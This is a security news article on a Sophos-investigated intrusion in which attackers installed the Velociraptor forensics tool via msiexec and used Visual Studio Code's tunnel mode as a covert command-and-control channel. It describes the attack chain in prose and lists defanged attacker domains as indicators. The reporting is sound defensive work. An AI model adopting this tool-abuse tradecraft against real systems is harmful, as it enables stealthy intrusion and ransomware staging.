A newly uncovered attack campaign investigated by Sophos’ Counter Threat Unit (CTU) reveals how adversaries are shifting tactics by leveraging legitimate security tools as offensive weapons.
In this case, attackers deployed the open-source Velociraptor digital forensics and incident response (DFIR) tool to establish remote access and pave the way for further compromise.
The incident highlights the increasing vulnerability of trusted software to manipulation, allowing malicious intent to be concealed.
Weaponizing a Tool Meant for Defense
The attack began with the use of the Windows msiexec utility, which downloaded an installer named v2.msi from a Cloudflare Workers domain identified as a staging site for malicious tools.
This installer deployed Velociraptor, a tool typically used by defenders to investigate intrusions, but here repurposed to communicate with a command-and-control server hosted on velo[.]qaubctgg[.]workers[.]dev.
Once installed, attackers executed an encoded PowerShell command to fetch Visual Studio Code from the same domain, running it with its tunnel option enabled.
The tunneling capability in Visual Studio Code, while designed for legitimate development use cases, has been abused in past incidents due to its ability to establish remote connections and enable code execution.
By activating this function, the attackers effectively turned the development environment into a covert channel to their server. To maintain persistence, the adversaries installed the program as a service and redirected its activity to log files.
Shortly after, they downloaded another malicious file named sc.msi, indicating continued staging of tools for later phases of the operation.
Detecting and Stopping a Ransomware Lead-Up
The suspicious use of Visual Studio Code tunneling triggered a Taegis™ alert, which led Sophos analysts to step in quickly. Their immediate advice to isolate the impacted host prevented the attackers from expanding their reach.
Analysis of the intrusion suggested that the activity would likely have progressed toward ransomware deployment if not disrupted.
The process tree revealed how Velociraptor was abused as the mechanism for launching Visual Studio Code’s tunneling mode, illustrating the attackers’ innovative use of a well-known incident response tool to mask malicious behavior.
Several related threats were identified during the investigation, including malware families detected as Troj/Agent-BLMR, Troj/BatDl-PL, and Troj/Mdrop-KDK.
The presence of these indicators suggests that the attackers had already prepared the groundwork for later stages of the campaign, which would have likely included data encryption and extortion.
Lessons for Defenders
This incident reflects a concerning shift in attacker methodology, where legitimate tools designed for investigation and response are co-opted as stealthy offensive utilities.
By reducing their reliance on bespoke malware and instead blending with authorized software activity, adversaries improve their chances of evading initial detection.
For defenders, this means that unexpected instances of Velociraptor or anomalous use of Visual Studio Code tunneling should be treated as serious indicators of compromise.
Implementing strong endpoint monitoring, reviewing access to external domains, and practicing disciplined incident response remain essential measures to mitigate the evolving ransomware threat.
IOC
| Indicator | Type | Context |
| files[.]qaubctgg[.]workers[.]dev | Domain name | Hosted tools used in August 2025 Velociraptor campaign |
| velo[.]qaubctgg[.]workers[.]dev | Domain name | C2 server used in August 2025 Velociraptor campaign |
Find this Story Interesting! Follow us on Google News , LinkedIn and X to Get More Instant Updates
.jpg?resize=1068,580&ssl=1&description=Velociraptor cyberattack - A newly uncovered attack campaign investigated by Sophos’ Counter Threat Unit (CTU) reveals how adversaries.){kind=link}